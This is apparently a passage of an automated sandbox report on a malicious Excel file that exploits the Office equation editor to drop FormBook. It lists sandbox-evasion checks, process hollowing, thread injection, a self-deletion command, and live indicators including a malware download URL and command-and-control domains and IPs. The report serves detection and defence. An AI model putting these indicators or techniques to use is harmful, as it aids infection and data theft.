          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Yara detected AntiVM3
          Source: Yara matchFile source: 4.2.vbc.exe.2564dd8.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.2505e58.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.478639061.00000000024C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.478926747.0000000002550000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 1416, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: vbc.exe, 00000004.00000002.478639061.00000000024C1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.478926747.0000000002550000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
          Source: vbc.exe, 00000004.00000002.478639061.00000000024C1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.478926747.0000000002550000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 0000000000078614 second address: 000000000007861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 00000000000789AE second address: 00000000000789B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1424Thread sleep time: -300000s >= -30000sJump to behavior
          Source: C:\Users\Public\vbc.exe TID: 1812Thread sleep time: -33348s >= -30000sJump to behavior
          Source: C:\Users\Public\vbc.exe TID: 2636Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exe TID: 2844Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cscript.exeLast function: Thread delayed
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004088E0 rdtsc 5_2_004088E0
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 33348Jump to behavior
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: vbc.exe, 00000004.00000002.478926747.0000000002550000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
          Source: explorer.exe, 00000006.00000000.485876483.000000000457A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ort\0000pciide\idechannel\5&12368b4a&0&7ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0acpi\pnp0a05\5cacpi\pnp0a05\25pciide\idech7
          Source: explorer.exe, 00000006.00000000.479969960.0000000000255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.494078232.000000000456F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: vbc.exe, 00000004.00000002.478926747.0000000002550000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: vbc.exe, 00000004.00000002.478926747.0000000002550000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000006.00000000.493996125.00000000044E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: explorer.exe, 00000006.00000000.497464057.000000000029B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
          Source: vbc.exe, 00000004.00000002.478926747.0000000002550000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004088E0 rdtsc 5_2_004088E0
          Source: C:\Users\Public\vbc.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_026126F8 mov eax, dword ptr fs:[00000030h]7_2_026126F8
          Source: C:\Users\Public\vbc.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00409B50 LdrLoadDll,5_2_00409B50
          Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 162.241.244.46 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 206.188.192.2 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 216.177.167.5 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.laqueenbeautybar.supplies
          Source: C:\Windows\explorer.exeDomain query: www.dairatwsl.com
          Source: C:\Windows\explorer.exeDomain query: www.vacoveco.com
          Source: C:\Windows\explorer.exeDomain query: www.hevenorfeed.com
          Sample uses process hollowing technique
          Source: C:\Users\Public\vbc.exeSection unmapped: C:\Windows\SysWOW64\cscript.exe base address: ED0000Jump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Injects a PE file into a foreign processes
          Source: C:\Users\Public\vbc.exeMemory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5AJump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Users\Public\vbc.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\Public\vbc.exeThread register set: target process: 1764Jump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeThread register set: target process: 1764Jump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exeJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"Jump to behavior
          Source: explorer.exe, 00000006.00000000.497620507.0000000000750000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.479969960.0000000000255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanG
          Source: explorer.exe, 00000006.00000000.497620507.0000000000750000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: !Progman
          Source: explorer.exe, 00000006.00000000.497620507.0000000000750000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager<
          Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformationJump to behavior
          Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.360cad0.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.511693460.00000000001C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.668980858.0000000000070000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.669019561.0000000000140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.511806943.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.503199195.00000000097CB000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.496910785.00000000097CB000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.470929460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.477062967.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.669067975.00000000001D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.511894951.00000000005B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.479122518.00000000034C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.360cad0.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.511693460.00000000001C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.668980858.0000000000070000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.669019561.0000000000140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.511806943.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.503199195.00000000097CB000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.496910785.00000000097CB000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.470929460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.477062967.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.669067975.00000000001D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.511894951.00000000005B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.479122518.00000000034C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Shared Modules          		Path Interception612
          Process Injection          		111
          Masquerading          		OS Credential Dumping221
          Security Software Discovery          		Remote Services11
          Archive Collected Data          		Exfiltration Over Other Network Medium1
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default Accounts13
          Exploitation for Client Execution          		Boot or Logon Initialization Scripts1
          Extra Window Memory Injection          		11
          Disable or Modify Tools          		LSASS Memory2
          Process Discovery          		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth12
          Ingress Tool Transfer          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)31
          Virtualization/Sandbox Evasion          		Security Account Manager31
          Virtualization/Sandbox Evasion          		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)612
          Process Injection          		NTDS1
          Remote System Discovery          		Distributed Component Object ModelInput CaptureScheduled Transfer122
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script11
          Deobfuscate/Decode Files or Information          		LSA Secrets1
          File and Directory Discovery          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common2
          Obfuscated Files or Information          		Cached Domain Credentials113
          System Information Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items21
          Software Packing          		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
          Extra Window Memory Injection          		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 562488 Sample: Vecchio debito_SKTGH_465585... Startdate: 28/01/2022 Architecture: WINDOWS Score: 100 52 Multi AV Scanner detection for domain / URL 2->52 54 Found malware configuration 2->54 56 Malicious sample detected (through community Yara rule) 2->56 58 17 other signatures 2->58 10 EQNEDT32.EXE 12 2->10         started        15 EXCEL.EXE 33 27 2->15         started        process3 dnsIp4 44 103.167.92.57, 49165, 80 AARNET-AS-APAustralianAcademicandResearchNetworkAARNe unknown 10->44 32 C:\Users\user\AppData\Local\...\vbc[1].exe, PE32 10->32 dropped 34 C:\Users\Public\vbc.exe, PE32 10->34 dropped 76 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->76 17 vbc.exe 1 5 10->17         started        36 ~$Vecchio debito_SKTGH_465585484754.xlsx, data 15->36 dropped file5 signatures6 process7 signatures8 46 Machine Learning detection for dropped file 17->46 48 Tries to detect virtualization through RDTSC time measurements 17->48 50 Injects a PE file into a foreign processes 17->50 20 vbc.exe 17->20         started        process9 signatures10 60 Modifies the context of a thread in another process (thread injection) 20->60 62 Maps a DLL or memory area into another process 20->62 64 Sample uses process hollowing technique 20->64 66 Queues an APC in another process (thread injection) 20->66 23 explorer.exe 20->23 injected process11 dnsIp12 38 dairatwsl.com 162.241.244.46, 49167, 80 UNIFIEDLAYER-AS-1US United States 23->38 40 www.hevenorfeed.com 216.177.167.5, 49166, 80 GVTCINTERNETUS United States 23->40 42 3 other IPs or domains 23->42 68 System process connects to network (likely due to code injection or exploit) 23->68 27 cscript.exe 23->27         started        signatures13 process14 signatures15 70 Modifies the context of a thread in another process (thread injection) 27->70 72 Maps a DLL or memory area into another process 27->72 74 Tries to detect virtualization through RDTSC time measurements 27->74 30 cmd.exe 27->30         started        process16

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Vecchio debito_SKTGH_465585484754.xlsx40%VirustotalBrowse
          Vecchio debito_SKTGH_465585484754.xlsx33%ReversingLabsDocument-OLE.Exploit.CVE-2017-11882

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\Public\vbc.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe100%Joe Sandbox ML

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          5.0.vbc.exe.400000.5.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.0.vbc.exe.400000.9.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.2.vbc.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.0.vbc.exe.400000.7.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          dairatwsl.com8%VirustotalBrowse
          www.vacoveco.com1%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://java.sun.com0%URL Reputationsafe
          http://www.hevenorfeed.com/yrcy/?jdfhnl=EvxTDFUPJ2-xUnMP&aN=H+0J8LIoM8xANCuc1KZRmbjixQokhoGpIPkQBETMRHrzrLtxV7SOMJUbaHNEQWxSCcCQ4A==0%Avira URL Cloudsafe
          http://www.laqueenbeautybar.supplies/yrcy/?jdfhnl=EvxTDFUPJ2-xUnMP&aN=v3r6hW97z/ZOf9TDdHCkxkGayxrL9igaQBwyCSAaMVPNp+0Lw1V9xr9SflbU5XGqGaZNIw==0%Avira URL Cloudsafe
          http://blog.iandreev.com/0%Avira URL Cloudsafe
          http://www.icra.org/vocabulary/.0%URL Reputationsafe
          http://103.167.92.57/CRC/vbc.exe100%Avira URL Cloudmalware
          http://www.dairatwsl.com/yrcy/?aN=e/RF5Wkvcu2kD6Q92hYVOLL0JiY85m+wPQ7mJBVhAbkMJKQBASQfBcFHsaVDtw323W8DmA==&jdfhnl=EvxTDFUPJ2-xUnMP0%Avira URL Cloudsafe
          www.drmichaelirvine.com/yrcy/100%Avira URL Cloudmalware
          http://blog.iandreev.com0%Avira URL Cloudsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
          http://servername/isapibackend.dll0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.laqueenbeautybar.supplies
          		206.188.192.2
          		truetrue
            		unknown
            dairatwsl.com
            		162.241.244.46
            		truetrueunknown
            www.hevenorfeed.com
            		216.177.167.5
            		truetrue
              		unknown
              www.vacoveco.com
              		unknown
              		unknowntrueunknown
              www.dairatwsl.com
              		unknown
              		unknowntrue
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://www.hevenorfeed.com/yrcy/?jdfhnl=EvxTDFUPJ2-xUnMP&aN=H+0J8LIoM8xANCuc1KZRmbjixQokhoGpIPkQBETMRHrzrLtxV7SOMJUbaHNEQWxSCcCQ4A==true
                • Avira URL Cloud: safe
                		unknown
                http://www.laqueenbeautybar.supplies/yrcy/?jdfhnl=EvxTDFUPJ2-xUnMP&aN=v3r6hW97z/ZOf9TDdHCkxkGayxrL9igaQBwyCSAaMVPNp+0Lw1V9xr9SflbU5XGqGaZNIw==true
                • Avira URL Cloud: safe
                		unknown
                http://103.167.92.57/CRC/vbc.exetrue
                • Avira URL Cloud: malware
                		unknown
                http://www.dairatwsl.com/yrcy/?aN=e/RF5Wkvcu2kD6Q92hYVOLL0JiY85m+wPQ7mJBVhAbkMJKQBASQfBcFHsaVDtw323W8DmA==&jdfhnl=EvxTDFUPJ2-xUnMPtrue
                • Avira URL Cloud: safe
                		unknown
                www.drmichaelirvine.com/yrcy/true
                • Avira URL Cloud: malware
                		low

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkexplorer.exe, 00000006.00000000.491850597.0000000002CC7000.00000002.00000001.00040000.00000000.sdmpfalse
                  		high
                  http://www.windows.com/pctv.explorer.exe, 00000006.00000000.491661834.0000000002AE0000.00000002.00000001.00040000.00000000.sdmpfalse
                    		high
                    http://java.sun.comexplorer.exe, 00000006.00000000.479969960.0000000000255000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://investor.msn.comexplorer.exe, 00000006.00000000.491661834.0000000002AE0000.00000002.00000001.00040000.00000000.sdmpfalse
                      		high
                      http://www.msnbc.com/news/ticker.txtexplorer.exe, 00000006.00000000.491661834.0000000002AE0000.00000002.00000001.00040000.00000000.sdmpfalse
                        		high
                        http://blog.iandreev.com/vbc.exe, 00000004.00000002.478639061.00000000024C1000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.icra.org/vocabulary/.explorer.exe, 00000006.00000000.491850597.0000000002CC7000.00000002.00000001.00040000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.explorer.exe, 00000006.00000000.555506199.0000000001BE0000.00000002.00000001.00040000.00000000.sdmpfalse
                          		high
                          http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000006.00000000.501167132.000000000447A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.560110260.00000000083F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.484447982.000000000447A000.00000004.00000001.00020000.00000000.sdmpfalse
                            		high
                            http://investor.msn.com/explorer.exe, 00000006.00000000.491661834.0000000002AE0000.00000002.00000001.00040000.00000000.sdmpfalse
                              		high
                              http://blog.iandreev.comvbc.exe, 00000004.00000002.478639061.00000000024C1000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.piriform.com/ccleanerexplorer.exe, 00000006.00000000.501167132.000000000447A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.560110260.00000000083F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.484447982.000000000447A000.00000004.00000001.00020000.00000000.sdmpfalse
                                		high
                                http://www.%s.comPAexplorer.exe, 00000006.00000000.555506199.0000000001BE0000.00000002.00000001.00040000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		low
                                http://www.autoitscript.com/autoit3explorer.exe, 00000006.00000000.479969960.0000000000255000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://support.mozilla.orgexplorer.exe, 00000006.00000000.479969960.0000000000255000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    http://windowsmedia.com/redir/services.asp?WMPFriendly=trueexplorer.exe, 00000006.00000000.491850597.0000000002CC7000.00000002.00000001.00040000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.hotmail.com/oeexplorer.exe, 00000006.00000000.491661834.0000000002AE0000.00000002.00000001.00040000.00000000.sdmpfalse
                                      		high
                                      http://servername/isapibackend.dllexplorer.exe, 00000006.00000000.499381564.0000000003E50000.00000002.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		low

                                      World Map of Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public IPs

                                      IPDomainCountryFlagASNASN NameMalicious
                                      162.241.244.46
                                      		dairatwsl.comUnited States
                                      		46606UNIFIEDLAYER-AS-1UStrue
                                      206.188.192.2
                                      		www.laqueenbeautybar.suppliesUnited States
                                      		55002DEFENSE-NETUStrue
                                      216.177.167.5
                                      		www.hevenorfeed.comUnited States
